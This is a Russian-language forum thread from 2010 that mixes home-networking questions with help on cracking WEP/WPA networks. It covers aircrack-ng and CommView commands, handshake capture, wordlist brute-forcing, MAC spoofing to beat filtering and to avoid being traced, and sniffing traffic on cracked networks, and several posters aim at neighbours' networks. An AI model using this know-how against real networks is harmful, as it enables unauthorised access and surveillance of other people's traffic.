
и я правильно ведь делаю?

1. начинаю собирать пакеты (#DATA)
2. всячески пытаюсь ускорить их сбор (но все равно за час набралось около 18к)
да кстати, какой лучший способ?
3.aircrack-ng -b [MAC] capture*.cap
?

спасибо)

F&D
17.02.2010, 21:42
Доброе время суток, All!
Подскажите пожалуйста как мне поступить в следующей ситуации:
У меня есть комп и ноут. Комп подключен к локалке один(естественно) кабелем =).
Встроенного Wi-Fi(допустим на матери) в нем нет, а хотелось бы чтобы он давал сигнал и я со своего ноута мог зайти в нэт, и вот что мне нужно купить, чтобы от своего компа я мог ловить сигнал Wi-Fi на ноуте.

Маршрутизатор мне советовали, но есть, какой нибудь более простой и незамысловатый способ?! :cool:

NikolaiR
17.02.2010, 22:36
Маршрутизатор мне советовали, но есть, какой нибудь более простой и незамысловатый способ?! :cool:
Беспроводный адаптер с возможностью работы в режиме Точка доступа (Access Point).

iv.
17.02.2010, 22:51
Ad-Hoc хватит, два компа же. Стало быть любой адаптер.

F&D
17.02.2010, 22:52
Беспроводный адаптер с возможностью работы в режиме Точка доступа (Access Point).

Что-то вроде этого (http://www.ixbt.com/comm/wrls-zyxel-zyair-g-220.shtml)?!

Kastor
17.02.2010, 23:52
Ну, если он действително может работать как точка доступа, то вполне сойдет для твоей цели.

Ad-Hoc хватит, два компа же.
Я в одну Ad-Hoc сеть соединял пять ноутов. Так что нет ограничения в два компа. Где то вычитал, что нельзя больше 8-ми, но проверить пока нет возможности.

n4e/\@
18.02.2010, 02:02
Сегодня пока ждал друга, совершенно спонтанно решил просканировать вай-фай точки ( дело было в жилом дворике ), нашлось штук 20 ( 15 с защитой, причем все с wpa, и 5 открытых )
Сканировал с помощью airodump-ng.
Решил попробовать подключиться к однйо из открытых точек доступа.
Сначала пробовал так:
iwconfig wlan0 essid BSSID_точки_доступа ( только сейчас, пока писал этот пост что надо было вводить название точки доступа а не мак )
Пытался получить ип командой dhcpcd wlan0, но не получилось( писалось таймаут) Потом пробовал набрать ifconfig wlan0 192.168.1.3 результата тоже не какого. Так я проделал со всеми открытыми точками, результата 0.
Вспомнил что когда то давно качал wicd и пакет должен был остаться на харде, нашел, установил. Попробовал подключаться через него, но резульата это не принесло. Подумал что может это фильтрация по маку такая. Опять запустил airodump-ng. Во второй таблице, там где я так понимаю показываются клиенты.
BSSID STATION PWR Rate Lost Packets Probes
Увидел в строке BSSID мак адрес открытой точки доступа, Probes то же был показан. Я подумал что если заменить свой мак на адрес из STATION то точка доступа выдаст мне ип.
Через телефон быстро нагуглил что мак меняется так:
ifconfig wlan0 ether XX:XX:XX:XX:XX:XX
Потом проделывал все те же действия что описывал выше, сначала пробовал подключится вручную, потом через wicd. Но у меня не чего не получилось.

Вот теперь у меня назрел вопрос, что я не так делал? То что я наверное неправильно подключался вручную, заметил только сейчас, но ведь и через wicd не получалось.

Bulder
18.02.2010, 15:27
Привет всем-неужели на форуме никто не знает возможно-ли анонимно юзать инет через Wi-Fi используя смартфон или ноут(так что-б остался незвестен мой IP)?

Kastor
18.02.2010, 22:38
Привет всем-неужели на форуме никто не знает возможно-ли анонимно юзать инет через Wi-Fi используя смартфон или ноут(так что-б остался незвестен мой IP)?
А есть смысл переживать за свой ip? Если бы ты сидел через выделенный канал, то вычислив твой адрес могли бы и узнать, где ты живешь. А через Wi-Fi это сделать намного сложнее. Лучше позаботься о смене мак-адреса. Именно он может указать, что ты был в такой то сети. А ip можно и менять со временем.

только сейчас, пока писал этот пост что надо было вводить название точки доступа а не мак
да, верно. Но можно и мак записывать, если вместо параметра "essid" использовать "AP".
Потом пробовал набрать ifconfig wlan0 192.168.1.3 результата тоже не какого.
Возможно надо было маску поодсети установить такую же, как используется в той сети.
Вот так например:
# ifconfig wlan0 172.20.0.17 netmask 255.255.255.0

Может быть там настройки автоматом выдаются? Тогда надо прописать:
dhclient wlan0

pazych bogdan
19.02.2010, 20:35
извините я не очень опытный пользователь виндовс 7 , (3 недели назад поставил).
Проблема в чем , сосед по комнате купил вай фай роутер , я с ним за роутер и пакет заплатил , сигнал сильный но виндовс через время выкинул ошыбку подключения , тоисть сеть видит а подключаться не хочет , походу проблемы с настройкой , если можете подскажите где и что исправить . спс за внимание

Kastor
20.02.2010, 01:29
Я в семерке вобще не работал еще, но думаю что проблема не в ней. Возможно точка доступа находится далековато от твоего компа. У меня тоже так было, сеть видна, а подключиться не могу. Подхожу ближе - все работает.
Только вот сообщение никакое не выскакивало. Приведи его скриншот.

ViinniPux
20.02.2010, 16:06
Airodump и CommViewForWiFi работать с ним, как я понял, не будут. А вот в BactTrack3 надеюсь все заработает.

VinniPux, скажи пожалуйста, ты пробовал этот адаптер (Orient XG-701A+) под BT3?

Отвечаю на все вопросы сразу) На диске к адаптеру Orient XG-701A+ были стандартные дрова под ХР и ВИСТУ, которые не позволяют работать чипу в режиме монитора! В back track 3 все работает прекрасно, не надо заморачиваться на счет драйверов, там все уже есть, да и устанавливать BT3 не обязательно, можно юзать с флэшки, как я и делаю. Вообщем мой всем совет: не мучайтесь со всякими CommView for WIFI и вообще с программами под Винду, а используйте BACK TRACK 3 !!! Ну не ломают сети на Windows-системах! Зато под Linux можно сделать все очень просто и быстро.

ViinniPux
20.02.2010, 16:20
Передо мной стоит сейчас другая проблема, никак не могу найти хороший словарик для подбора пароля от WPA-CCMP, пробовал где-то 5 разных словарей от маленьких до больших(около 50мб). Может кто-нибудь подскажет хороший словарик!!!

NikolaiR
20.02.2010, 22:30
Может кто-нибудь подскажет хороший словарик!!!
Присоединяюсь!Нужен нормальный словарь для подбора wpa.

На одном сайте я прочитал такую фразу - you must capture the full 4 way handshake.Здесь на форуме тоже читал что нужно словить четыре хендшейка.Это нужно четыре хендшейка в один cap(кап) файл собрать,или четыре файла с одной точки доступа в каждом по одному хендшейку?

e1337
21.02.2010, 20:15
Вопрос такой. Заловил пакет авторизации WPA. Выбираю словарь в AiroWizard'e запускается айркрак и говорит passphrase not in dictionnary. Че за фигня?? Словарь с русскими словами. Одна строка - одно слово. Имеет значение в какой кодировке текстовый файл? Если да то в какой нужно?

NikolaiR
21.02.2010, 22:42
Имеет значение в какой кодировке текстовый файл? Если да то в какой нужно?

У меня была такая проблема.Я в блокноте открыл файл нажал Сохранить как и сохранил его в кодировке UTF-8.После этого в айркраке пошёл перебор слов,а до этого тоже писал passphrase not in dictionnary.

ysmat
27.02.2010, 03:01
ошибка при запуске kismet
FATAL: Unknown capture source type 'mac80211' in source 'mac80211,wlan0,at
что это может быть?
в файле kismet.conf настройки вроде правильные

ysmat
02.03.2010, 15:53
как оказалось мой процес драйвера имеет имя ath5k
поетому правильный конфиг source=ath5k,wlan0,at
непонятно только что тогда такое mac80211

Stopko_0
02.03.2010, 22:55
судя по гуглу, это подсистема(модуль) =)

veter069
04.03.2010, 18:40
Хочу настроить сеть между ноутбуком и пк, на обоих windows 7 максимальная, завязаны через маршрутизатор dlink d300, ноутбук через wifi пк через сетевку внутренние ip 192.168.0.100 \ 192.168.0.101 опыта в создание локальной сети почти нет поэтому задаю вопрос как настроить?
зы:http://www.dlink.ru/ru/faq/68/921.html эти дейстивия выполнял

Elvis000
06.03.2010, 01:53
Хочу настроить сеть между ноутбуком и пк,

самый легкий способ использовать Cisco Network Magic Pro, она сама тебе все настроит.

Stopko_0
06.03.2010, 10:10
вопрос: как объединить дампы форматов dump, pcapdump, cap в один файл? проблема в том, что у меня есть куча файлов дампов, захваченных разными версиями кисмета и айродампа. хочется как то слить их вместе.

ysmat
06.03.2010, 21:48
у меня тоже подобная проблема запускал airdump 2 раза для скана одной и той же точки
в результате он сформировал файлы linc-01.ivs и linc-02.ivs
в каждом одельно взятом файле недостаточно данных для нахождения ключа
но возможно в общем данных будет достаточно
вопрос как эти два файла склеить в один

NikolaiR
07.03.2010, 02:54
Скажите пожалуйста,как установить spoonwep2.lzm в BackTrack 4 образ для VMware?

UnitUnique
07.03.2010, 13:45
можно ли антенну от роутера подключить к адаптеру ?

можно ли при выводе внешней антенны для встроенной карты оставить работоспособными встроенные антенны, чтобы и то и то работало ?

BrainDeaD
07.03.2010, 14:34
1)можно, но паять придётся. нужно хорошо разбираться в схеме, чтобы знать, что куда лаепить. ну и там внутри так всё мелко, что пайка - просто мука, и не факт, что всё получится.
2)на сколько знаю, нельзя. внутренняя антенна фонит или чтото такое. короче её всегда отрубают.

UnitUnique
07.03.2010, 15:35
я думал и у роутера и у адаптеров одинаковые разъемы...открутил от роутера прикрутил к адаптеру...имеется ввиду конечно внешний адаптер или соответствующий SMA разъем!

BrainDeaD
07.03.2010, 15:56
на адапторе разъём поменьше будет, он под pigtail. хотя щас столько разных адапторов, антенн, рутеров, что хрен разберёшься. бери антенну пробуй.

riviar
10.03.2010, 23:26
Здравстуйте! подскажите пож как узнать какой чипсет на адаптере(Linksys WUSBF54G), и где взять дрова под ХР чтобы работал AiroWizard? спасибо!

spawn89
11.03.2010, 00:54
Здравстуйте! подскажите пож как узнать какой чипсет на адаптере(Linksys WUSBF54G), и где взять дрова под ХР чтобы работал AiroWizard? спасибо!
в зависимости от ревизии (версии адаптера) могут быть следующий чипы:
Linksys WUSB54GC v1 Ralink RT73
Linksys WUSB54GC v2 RTL8187B
Linksys WUSB54G v4 Ralink rt2570

а так как аеровизард = портированный эиркрак, то ни одна из этих каточек по совместима с этой прогой
вот сайт со списком адаптеров для аэровизарда - http://airodump.net/airowizard-windows-wlan-hacking/
список карточек для эиркрака - http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_bes t_card_to_buy

FreeSmack
11.03.2010, 16:05
добрый день,можно ли как нибудь взломать wep код через телефон?просто у меня только на мобиле есть вай вай,что вы посоветуйте?

F&D
11.03.2010, 17:09
Посоветуйте пожалуйста ХОРОШУЮ сетевую wifi карту.

spawn89
11.03.2010, 17:17
добрый день,можно ли как нибудь взломать wep код через телефон?просто у меня только на мобиле есть вай вай,что вы посоветуйте?
врядли, даже нет

spawn89
11.03.2010, 17:25
Посоветуйте пожалуйста ХОРОШУЮ сетевую wifi карту.
ну бери любую на чипе Atheros на USB, RTL8187L, Ralink rt2x00, rt2500, rt2570, rt61 and rt73 (судя по таблице совестимостей на сайте эиркрака)
лично у меня asus wl-167g (Ralink rt73) и все работает))
если нужна и виндовс совместимость то PCMCIA/Cardbus/Express Card Linksys WPC55AG
v1.2 ONLY!!!!!

F&D
11.03.2010, 17:33
ну бери любую на чипе Atheros на USB, RTL8187L, Ralink rt2x00, rt2500, rt2570, rt61 and rt73 (судя по таблице совестимостей на сайте эиркрака)
лично у меня asus wl-167g (Ralink rt73) и все работает))
если нужна и виндовс совместимость то PCMCIA/Cardbus/Express Card Linksys WPC55AG
v1.2 ONLY!!!!!

Спасибо.
Мне вообще нужно чтобы под 7-ой работало. :rolleyes:

spawn89
11.03.2010, 17:59
Спасибо.
Мне вообще нужно чтобы под 7-ой работало. :rolleyes:
тогда ты немноожко так темкой ошибся))) ну а вобще действительно на чипе Atheros хорошие адаптеры и своим я тоже не жалуюсь

m@stik@
11.03.2010, 18:12
backtrack 4 Wpa2 Cowpatty y aircrack-ng cracking
был такой вопрос уже- на ютубе в этом ролике чувак собрал ЧЕТЫРЕ
хендшейка.
Где посмотреть, скока я собрал?
как собрать больше одного?
у меня писал в команде cowpatty что недостаточно хендшейков... :(

borush
11.03.2010, 20:34
Набрел на открытую точку подко лючился, могу зайти на страницу настроек модема, а в инет не получается. Что делать помогите новичку!

Stopko_0
11.03.2010, 22:17
зависит от того, как именно подключена точка. если получение настроек по DHCP не прокатывает, то ничего не сделать, ибо скорей всего там PPPoE, а логина пароля ты не знаешь и врядли узнаешь.

spawn89
11.03.2010, 23:06
зависит от того, как именно подключена точка. если получение настроек по DHCP не прокатывает, то ничего не сделать, ибо скорей всего там PPPoE, а логина пароля ты не знаешь и врядли узнаешь.
не факт, может там все прописано ручками или же мак фильтр или же это honeypot

borush
11.03.2010, 23:28
Там действительно РРоЕ и пароль звездочками, а фильтрации никакой и МАС известен. Неужели ничего нельзя сделать, может ловить пакеты как с шифроывнием? Кстати при первом обнаружении точки мне удалось выйти в сеть и скорость бешеная. Там видимо стрим стоит.

borush
12.03.2010, 21:38
Кстати при как бы подключении никакого пароля или логина не спрашивается.

Stopko_0
13.03.2010, 04:30
при каком подключении? в саму сетку вай-фай?
что касается выхода в инет, это уже тема не вай-фай раздела получается:) кури в сторону утилиты пинга самого беспроводного роутера и читай его логи

borush
13.03.2010, 22:35
Спасибо, какие еще у кого мысли и проедложения? Самое смешное, что кратковременно и как бы случайно удается попасть в инет. Может быть в то время когда сама точка начинает работать?

php_master
15.03.2010, 22:32
Ребят, помогите пожалуйст, есть точка WEP, ключ я сломал, 64бит оказался, но в сеть не пускает.
Когда ввожу его то застряет на получении сетевого адреса. Я думаю что причина в том что на AP есть привязка к MAC/IP.....
работаю с помощью Commview for WIFI на WinXP SP3

ВОПРОС: Как с помощью Commview for WIFI узнать необходимые настройки для подключения т.е. IP адрес, основной шлюз, маску подсети одного из клиентов ?? На какую вкладку либо значения в Commview for WIFI следует обратить внимание?

Kastor
15.03.2010, 22:58
php_master, раз ты взломал WEP, следовательно можешь просматривать пролетающий мимо трафик. Для этого заодишь в меню "Настройка"->"Ключи WEP/WPA" и в появившемся окне устанавливаешь скольки битный ключ используется в сети и сам ключ (кажется надо прописывать ключ в 16ричной системе, а не ASCII). После этого на вкладке "Текущие IP соединения" ты можешь наблюдать пролетающие в этой сети пакеты. Там будут указаны IP адреса источника и получателя (а так же их маки, если захочешь себе такой же поставить), так ты можешь определить какие сетевые настройки используются в сети. На счет маски подсети, то я не знаю как ее определить. Но в основном это 255.255.255.0 или 255.255.252.0. Пробуй, потом расскажешь как все прошло.

LLIYKA
17.03.2010, 12:47
приветствую
подскажите как происходит процес подключения к wi fi точке(когда мы пишем её ip в браузере). прост хочу написать переборшик паролей, темной лошадкой остался этот пункт.(не знаю как сделать процес проверки пароля и логина)

STALKER--2011
17.03.2010, 17:16
Народ. посоветуйте как можно усилить (чтобы дваьше ловила) встроенную вай-фай карту в нетбуке?Выхода под антену у неё нету.Я подумываю чтобы купить юсб вай-фай модуль с антеной и возможностю подключения внешней антены.Кто знает - посоветуйте какой лутче выбрать.

FreeSmack
17.03.2010, 21:39
Народ,ответьте плиз на вопросы:
1)Сильнее ли ловит usb wi-fi адаптер чем встроеный модуль вай фай на мобильнике,если да то во сколько раз?
2)Могу ли я сделать свою вай фай сеть с помощью 2х вай фай адаптеров подключенный к 2м компам,а точнее можно ли кабельный интернет перекинуть на вай фай адаптер чтобы он передавал инет второму компу?
3)Можно ли брутить пасы к сетям с помощью usb вай фай адаптера?
Ответьте пожалуйста подробно,заранее большое спасибо!

BrainDeaD
17.03.2010, 21:57
1) адаптер обычно сильнее. на сколько, сказать трудно. всё зависит от адаптора и телефона.
2) можешь. через ad-hoc соединение.
3) можно, но он должен быть на подходящем чипсете.

FreeSmack
17.03.2010, 22:58
а какой должен быть чипсет?Можете посоветовать что-нить из недорогих и годных для взлома?

BrainDeaD
18.03.2010, 00:34
http://bit.ly/biy4FV

смотри в самом низу список USB

FreeSmack
18.03.2010, 00:46
Я решил отказаться от usb и решил взять на pci,а у них есть свои нюанс по взлому?

BrainDeaD
18.03.2010, 00:52
там всё так же. главное чтоб нужные дрова под чипсет были.

spawn89
18.03.2010, 02:45
там всё так же. главное чтоб нужные дрова под чипсет были.
и чтобы чипсет в принципе потдерживался прогами

BrainDeaD
18.03.2010, 12:15
чипсет ничего общего с прораммами не имеет. они работют с железом через драйвера. так что выражение "чипсет потдерживался прогами" в корне неверно. с моей стороны речь шла о aircrack и его драйверах. так что если чипсет поддерживается их дровами, то следовательно он будет работать и с прогами.

spawn89
18.03.2010, 13:22
чипсет ничего общего с прораммами не имеет. они работют с железом через драйвера. так что выражение "чипсет потдерживался прогами" в корне неверно. с моей стороны речь шла о aircrack и его драйверах. так что если чипсет поддерживается их дровами, то следовательно он будет работать и с прогами.
какими их дровами???? попробуй эиркрак запустить на интеловском чипе...
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_bes %20t_card_to_buy вот прочитай что советует твой эиркрак

BrainDeaD
18.03.2010, 14:11
например madwifi-ng. это партнёрский пройект aircrack, который делает подходящие дрова Atheros. но речь не о них , а о драйверах в списке на сайте aircrack., я немного неправильно выразился. aircrack работает и с драйверами производителей, но далеко не всех. так что надо выбирать карту с драйверами которой работает aircrack, а не "чипсет потдерживался прогами". так более ясно?

zhelezn1
20.03.2010, 15:32
чем кроме jtr можно брутить файлы cap? нужна опция полного перебора.

borush
24.03.2010, 23:58
Карточка DWL-G680 можно ли присобачить внешнюю антеннку к девайсу может кто уже делал (или пытался) поделитесь опытом. Спасибо.

riviar
26.03.2010, 01:16
Помогите неграмотному , запускаю в ХР airidump-ng 0.9.3 , когда дохожу до Only write WEP IUs он мне выдаёт что драйвер адаптера не совместим с PEEK Protokol, и отправляет меня на сайт и я не знаю что мне там скачивать, хотя в папке patches мой драйвер указан???

DLight
31.03.2010, 00:57
Помогите!
WEP KEY FOUND 100% 28:99:51:00:b2
как его разшифровать?

BrainDeaD
31.03.2010, 01:02
Помогите!
WEP KEY FOUND 100% 28:99:51:00:b2
как его разшифровать?

http://www.dolcevie.com/js/converter.html

но этот пароль надо задавать в хексадецимальном виде, т.к. он не может быть полностью конвертирован в ascii

riviar
31.03.2010, 10:15
подскажите пожалуйста, запускаю ВТ4 через virtualbox, все делаю по инструкции 9 шагов или БТ4 взлом wep для начинающих!
02.11.2009, 21:29
но уже на 4шаге облом , выдает мне следующее (notice: you specified "-bssid". Did you mean "--bssid" instead? Notice: Channel range already given)
карточка Palm wlan USB realtek RTL8187

DLight
31.03.2010, 14:52
http://www.dolcevie.com/js/converter.html

но этот пароль надо задавать в хексадецимальном виде, т.к. он не может быть полностью конвертирован в ascii
его возможно в винде ввести?

BrainDeaD
31.03.2010, 16:00
да. винде всё равно hex или ascii

DLight
31.03.2010, 23:27
Ончень интересно возможно ли подключить 1 копьютер (win) к разным интернет точкам так, чтоб скорость интернета суммировалась?
У меня установлено 3 wifi адаптера, все 3 ловят интернет от разных соседей. Можно ли эти соеденения сложить, для увиличения скорости интернета?

BrainDeaD
01.04.2010, 02:41
нет. в теории может быть, но очень сложно. нужен специальный софт/драйвер, но такого я ещё не видел.

Karantin
01.04.2010, 02:45
Ончень интересно возможно ли подключить 1 копьютер (win) к разным интернет точкам так, чтоб скорость интернета суммировалась?
У меня установлено 3 wifi адаптера, все 3 ловят интернет от разных соседей. Можно ли эти соеденения сложить, для увиличения скорости интернета?
Настраивай маршрутизацию и пускай разные приложения под разными соединениями.

EksTasy
04.04.2010, 17:49
riviar, нужно писать не -bssid, а --bssid

zmei555
05.04.2010, 01:32
Господа я вообщем не силён во всяких примудростях вафли но интересует такой вопрос! На работе есть халявный WiFi но вот беда до моего кабинета он не дотягивает метров 15 плюс дверь как до тянуть его до меня!!! Может какая нибуть антена направленаяч нужна?

php_master
05.04.2010, 12:31
подскажите пожалуйста программу с помощью которой можно извлечь WPA hash из *.CAP файла или файла лога COMVIEW For WIFI

Kastor
05.04.2010, 13:41
zmei555, можно попробовать антену. Если у тебя на стационаре PCI карточка, то думаю там есть куда прикрутить антену. Если ноут, то ко встроенной карточке ты врядли ее припаяешь. Поэтому можно купить usb-шный адаптер с разьемом под антену. В этой ветке очень много адаптеров рассмотрено, можно из них выбрать
http://forum.antichat.ru/thread57249.html

php_master, если честно я о таких прогах не знаю. У меня есть подобная, называется WirelessKeyView. Она восстанавливает парольи WEP/WPA из системы. Только ее запускать конечно придется на компе, у которого есть пароль для сети.
А что тебе даст этот hash?

php_master
05.04.2010, 16:15
Kastor, мне этот хэш нужен чтобы вручную ввести его програмку для расшифровки CAIN, т.к. Elcomsoft Wireless Security Auditor & Distributed Password Recovery у меня почему то не расшифровывают пароль (при добавлении *.CAP или ComVIEW *.log файла не показывает SSID точки вообще, только MAC адрес), а CAIN - Это единственная программка, которая смогла расшифровать пароль... aircrack-ng тоже смогла отлично расшифровать, но с CAIN удобнее работать

DrOn55
08.04.2010, 08:56
Есть у меня ноут с wi-fi адаптером Atheros AR5007EG c виндой XP SP3. И у себя дома я ловлю wi-fi сеть с WEP шифрованием. Скажите какие проги и дрова надо, чтобы ломануть эту сетку?

STALKER--2011
08.04.2010, 12:35
Есть у меня ноут с wi-fi адаптером Atheros AR5007EG c виндой XP SP3. И у себя дома я ловлю wi-fi сеть с WEP шифрованием. Скажите какие проги и дрова надо, чтобы ломануть эту сетку?
Можеш попробывать CommView for WiFi.В принципе ето то что тебе надо.
Жалко что у меня ета прога не пошла.

php_master
08.04.2010, 17:47
Люди, помогите разобраться с программами:
1) Сain & Abel v 4.9.23
2) Distributed Password Recovery v.2.90.215

Использую:
1)WinXP SP3
2) WIFI-адаптер TP-Link WN561G (PCI), для работы с COMView For WIFI подходит
3)CommView.for.WiFi.5.6.Build.553

1. Какие драйвера следует установить чтобы Сain & Abel смог перехватывать WPA - хэши? (сайчас на компе установлены драйвера предложенные программой COMView) При работе программа показывает только список AP но не может захватить какой либо канал

2. При добавлении *.cap файла в Distributed Password Recovery v.2.90.215 программа распознает только MAC-адрес точки подключения и MAC-адрес клиента, но не показывает имя точки (SSID), т.е. пустое поле. CAP файл создан CommView.for.WiFi.5.6.Build.553... может я что то неправильно делаю, или програмку битую скачал? помогите, может кто сталкивался

DrOn55
09.04.2010, 05:43
STALKER--2011
Спасибо, попробую.

trup_slona
09.04.2010, 13:17
CommView for WiFi при сканировании показывает что на канале 13 есть нешифрованная точка доступа. SSID отображается. Но при поиске сетей виндовым поиском, либо с помощью WiFi Hopper эта точка не отображается и соответственно подключиться к ней нет возможности. В чем может быть причина? Каким образом можно подключиться? У меня адаптер Atheros AR5007EG, ось Win XP SP3.

STALKER--2011
09.04.2010, 16:37
trup_slona, можеш попробывать Easy WiFi Radar (бесплатна,понятна ,проста) или WirelessMon (платна,много возможностей и функционала, понятна).

trup_slona
10.04.2010, 08:11
trup_slona, можеш попробывать Easy WiFi Radar (бесплатна,понятна ,проста) или WirelessMon (платна,много возможностей и функционала, понятна).

Нет, эти программы тоже не видят точку, только в CommView отображается.

Kastor
10.04.2010, 15:00
При помощи некоторых программ можно ловить те сети, которые другие и не увидят. Сегодня вот под виндой видел две сети. Сканировал в BT3 - нашел целых пять.